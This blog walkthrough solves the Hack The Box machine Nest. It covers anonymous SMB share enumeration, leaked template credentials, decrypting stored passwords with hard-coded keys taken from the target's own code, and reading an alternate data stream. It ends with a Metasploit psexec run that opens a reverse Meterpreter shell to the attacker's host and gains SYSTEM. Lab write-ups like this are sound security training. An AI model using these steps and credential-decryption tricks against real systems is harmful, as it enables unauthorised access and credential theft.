Nanobyte Security | HTB Nest Walkthrough

HTB Nest Walkthrough



[ HTB_Walkthrough  smbclient  alternate_data_stream  reverse_engineer  ]

This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.

My first Nmap scan, run with multiple flags, failed. A plain nmap scan with no options returned only one open port:

nmap 10.10.10.178                                                                                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST                                                      
Nmap scan report for 10.10.10.178                                                                                    
Host is up (0.043s latency).                                                                                         
Not shown: 999 filtered ports                                                                                        
PORT    STATE SERVICE                                                                                                
445/tcp open  microsoft-ds                                                                                           
                                                                                                                     
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds

With only port 445 open, I turned to SMB. Server Message Block is the protocol Windows uses to share files, printers, serial ports and IPC abstractions such as named pipes and mailslots between hosts; Samba is the open-source implementation of that protocol, and it ships the smbclient tooling used below.

smbclient -L //10.10.10.178
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

smbclient -L listed several network shares. smbclient is the Samba client and gives an FTP-like interface to a share. Pressing Enter at the password prompt (an anonymous, or null, session) was enough to list the shares and browse some of them. Going through each one, I found what looked like a list of usernames in the Users share. I took note of these, since this information was sure to come up later in the box:

smbclient \\\\10.10.10.178\\Users
Enter WORKGROUP\root's password: 

smb: \> dir
  .                                   D        0  Sat Jan 25 17:04:21 2020
  ..                                  D        0  Sat Jan 25 17:04:21 2020
  Administrator                       D        0  Fri Aug  9 10:08:23 2019
  C.Smith                             D        0  Sun Jan 26 01:21:44 2020
  L.Frost                             D        0  Thu Aug  8 12:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 12:02:50 2019
  TempUser                            D        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available

I tried each of the user directories listed, but access was denied to all of them. Continuing through the shares, I connected to Data and found I could browse the Shared directory:

smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 17:53:46 2019
  ..                                  D        0  Wed Aug  7 17:53:46 2019
  IT                                  D        0  Wed Aug  7 17:58:07 2019
  Production                          D        0  Mon Aug  5 16:53:38 2019
  Reports                             D        0  Mon Aug  5 16:53:44 2019
  Shared                              D        0  Wed Aug  7 14:07:51 2019

                10485247 blocks of size 4096. 6449754 blocks available

smb: \Reports\> cd ..\Shared
smb: \Shared\> dir
  .                                   D        0  Wed Aug  7 14:07:51 2019
  ..                                  D        0  Wed Aug  7 14:07:51 2019
  Maintenance                         D        0  Wed Aug  7 14:07:32 2019
  Templates                           D        0  Wed Aug  7 14:08:07 2019

                10485247 blocks of size 4096. 6449754 blocks available

In the Maintenance directory I found a file, Maintenance Alerts.txt. I used the get command to download it to my local box and viewed it on my Kali machine:

smb: \Shared\Maintenance\> dir
  .                                   D        0  Wed Aug  7 14:07:32 2019
  ..                                  D        0  Wed Aug  7 14:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 18:01:44 2019

                10485247 blocks of size 4096. 6449754 blocks available
                
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)


root@bhax0r:~# cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work

Still nothing useful. I went back up one level into the Templates directory and found another file, Welcome Email.txt, which sounded promising:

smb: \Shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 14:08:01 2019
  ..                                  D        0  Wed Aug  7 14:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 17:55:36 2019

                10485247 blocks of size 4096. 6449754 blocks available

smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)



root@hax0r:~# cat 'Welcome Email.txt' 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you

That gave me a possible set of credentials, TempUser:welcome2019. Remembering the Users share from earlier, I connected to it again with these credentials:

smbclient \\\\10.10.10.178\\Users -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> cd TempUser
smb: \TempUser\> dir
  .                                   D        0  Wed Aug  7 17:55:56 2019
  ..                                  D        0  Wed Aug  7 17:55:56 2019
  New Text Document.txt               A        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available
                
smb: \TempUser\> get "New Text Document.txt"
getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)



root@hax0r:~# cat 'New Text Document.txt' 

That file was empty, so no further information there. I then tried the other usernames against the Users share with the same password (users don't always change default passwords), but that did not work either. So I moved on and tried the TempUser credentials against the other shares, and found they got me into Secure$:

smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019
  IT                                  D        0  Thu Aug  8 05:59:25 2019

                10485247 blocks of size 4096. 6449738 blocks available
 

There was nothing in that share that I could use yet. Moving on, the TempUser credentials also let me into the IT directory of the Data share, where I found two interesting files, RU_config.xml and config.xml:

 smb: \IT\Configs\RU Scanner\> ls
  .                                   D        0  Wed Aug  7 15:01:13 2019
  ..                                  D        0  Wed Aug  7 15:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 14:49:37 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\RU Scanner\> get RU_config.xml 
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)


root@hax0r:~# cat RU_config.xml                                                                                                                                                                                                           
<?xml version="1.0"?>                                                                                                                                                                                                                      
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">      
  <Port>389</Port>                                                                                                                                                                                                                         
  <Username>c.smith</Username>                                                                                       
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 14:31:37 2019
  ..                                  D        0  Wed Aug  7 14:31:37 2019
  config.xml                          A     6451  Wed Aug  7 18:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 14:30:27 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\NotepadPlusPlus\> get config.xml 
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)


root@hax0r:~# cat config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...

Neither looked like much at first, but both hold important information. First, RU_config.xml gives a username, c.smith, and a 44-character Base64 string that decodes to exactly 32 bytes, a multiple of the AES block size; a value stored that way is encrypted rather than hashed, and can be decrypted if the program that wrote it can be found. Second, and easy to miss, the second File filename entry in config.xml reveals a path that no share listing had shown: a Carl directory under Secure$\IT. The password in RU_config.xml belongs to c.smith; could c.smith be Carl?

I logged in and attempted to see if I could get to the Carl directory:

smbclient \\\\10.10.10.178\\Secure$ -U TempUser                                                       
Enter WORKGROUP\TempUser's password: welcome2019
Try "help" to get a list of possible commands.                                                                       
smb: \> dir                                                                                                          
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019                                           
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019                                                                                                                                                                 
  IT                                  D        0  Thu Aug  8 05:59:25 2019             
                                                                                                                     
                10485247 blocks of size 4096. 6449738 blocks available                                               
smb: \> cd IT                                                                                                        
smb: \IT\> dir                                                                                                       
NT_STATUS_ACCESS_DENIED listing \IT\*                                                                                
smb: \IT\> cd Carl                                                                                                   
smb: \IT\Carl\> dir                                                                                                  
  .                                   D        0  Wed Aug  7 14:42:14 2019
  ..                                  D        0  Wed Aug  7 14:42:14 2019
  Docs                                D        0  Wed Aug  7 14:44:00 2019
  Reports                             D        0  Tue Aug  6 08:45:40 2019
  VB Projects                         D        0  Tue Aug  6 09:41:55 2019

And that worked! Note that inside Secure$\IT I could not list the directory contents, yet I could still change into Carl. The ACL on IT denies listing, but the Carl subdirectory itself is readable, and Windows grants Everyone the Bypass traverse checking privilege by default, so a directory that refuses to be listed does not stop access to a child whose name you already know. That name is exactly what the Notepad++ history leaked. Enumerating Carl's files, I found an RUScanner project in the VB Projects directory:

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir
  .                                   D        0  Wed Aug  7 17:05:54 2019
  ..                                  D        0  Wed Aug  7 17:05:54 2019
  bin                                 D        0  Wed Aug  7 15:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 17:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 17:05:44 2019
  My Project                          D        0  Wed Aug  7 15:00:11 2019
  obj                                 D        0  Wed Aug  7 15:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 10:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 07:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 17:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 14:49:35 2019

                10485247 blocks of size 4096. 6449951 blocks available

Utils.vb contains the Encrypt and Decrypt functions. They derive a symmetric key with Rfc2898DeriveBytes (PBKDF2) from a passphrase, salt and iteration count that are hard-coded in the source, so the ciphertext in RU_config.xml is recoverable by anyone who has the code; the "encryption" is really just obfuscation. Rather than reverse the routine by hand, I copied the whole project tree to a Windows machine and compiled it with Visual Studio.

Once compiled, running the binary threw an error:

Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'

Since I had RU_config.xml, which holds the Base64-encoded ciphertext (not a hash), I dropped it into that directory and the program ran without any exceptions. I then added a single line to the Decrypt function in Utils.vb to write the plaintext to the console:

Public Shared Function Decrypt(ByVal cipherText As String, _
...
        Console.WriteLine(plainText) ' added: print the decrypted value before returning it
        Return plainText
...

After recompiling and running it again, the plaintext password appeared:

\RUScanner\bin\Debug>DbPof.exe
xRxRxPANCAK3SxRxRx

With that, I could connect to the Users share as C.Smith and grab user.txt:

smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRx

smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 01:21:44 2020
  ..                                  D        0  Sun Jan 26 01:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 18:06:17 2019
  user.txt                            A       32  Thu Aug  8 18:05:24 2019

                10485247 blocks of size 4096. 6449757 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)


root@hax0r:~# cat user.txt 
xxxxxxxxxxxxxxx4fd827e05f426e987

On to root. In the HQK Reporting directory I found a password file:

smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Thu Aug  8 18:06:17 2019
  ..                                  D        0  Thu Aug  8 18:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 07:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 18:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 18:09:05 2019

                10485247 blocks of size 4096. 6449725 blocks available

But it was empty (0 bytes); that would have been too easy. A look at the file's attributes with allinfo, however, showed a named alternate data stream (ADS) attached to it. NTFS stores an ADS alongside the file's main ($DATA) stream, so a normal directory listing reports the file as empty while the Password stream still holds 15 bytes. On the Windows side the same streams show up with dir /R or Get-Item -Stream *; over SMB, smbclient's allinfo lists them and get fetches one with the file:stream syntax:

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 06:06:12 PM 2019 CDT
access_time:    Thu Aug  8 06:06:12 PM 2019 CDT
write_time:     Thu Aug  8 06:08:17 PM 2019 CDT
change_time:    Thu Aug  8 06:08:17 PM 2019 CDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"


root@hax0r:~# cat "/root/Debug Mode Password.txt:Password" 
WBQ201953D8w 

With this password I could telnet to the HQK Reporting Service on port 4386 and enable debug mode (note that the password travels in cleartext over telnet):

telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

Still in the telnet session, I enumerated the service's directories with the commands debug mode unlocks. Stepping up one directory with SETDIR and into LDAP, I found a config file:

>list  

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Decrypting this value with the RU Scanner constants compiled into DbPof.exe failed with a padding exception. That is the expected symptom of AES-CBC decryption with the wrong key: the final block does not end in valid PKCS#7 padding. Looking into HqkLdap.exe (the listing below is decompiler output), I found the following in its CR class:

' HqkLdap.CR
' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
Public Shared Function DS(EncryptedString As String) As String
	If String.IsNullOrEmpty(EncryptedString) Then
		Return String.Empty
	End If
	Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
End Function

This is a different parameter set: different passphrase and salt strings, a different iteration count (3) and a different IV, fed to the same decrypt logic (the arguments line up with the parameters of the Utils.vb Decrypt function). So I swapped these constants into the Decrypt call in DbPof.exe, replaced the c.smith ciphertext in RU_config.xml with the Administrator one, reran DbPof.exe from a command prompt, and got the Administrator password:

DbPof.exe
XtH4nkS4Pl4y1nGX

Connecting to the Users share as Administrator only turned up a shortcut to the admin's desktop, which was no good. So, after several failed attempts with evil-winrm, impacket's psexec.py and winexe, I used Metasploit's psexec module with a reverse_tcp Meterpreter payload:

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp        

msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/smb/psexec) > set LPORT 4538
LPORT => 4538
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178
RHOSTS => 10.10.10.178
msf5 exploit(windows/smb/psexec) > set SMBUser
SMBUser => 
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGX
SMBPass => XtH4nkS4Pl4y1nGX

msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4538 
[*] 10.10.10.178:445 - Connecting to the server...
[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...
[*] 10.10.10.178:445 - Selecting PowerShell target
[*] 10.10.10.178:445 - Executing the payload...
[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.178
[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600

meterpreter > shell
Process 1456 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>more root.txt
more root.txt
xxxxxxxxxxxxxxxxxxx08a42f0b94b878c41

And that rooted the box! The name Nest really fits this chain of steps, each one nested inside the last. Thanks for reading!
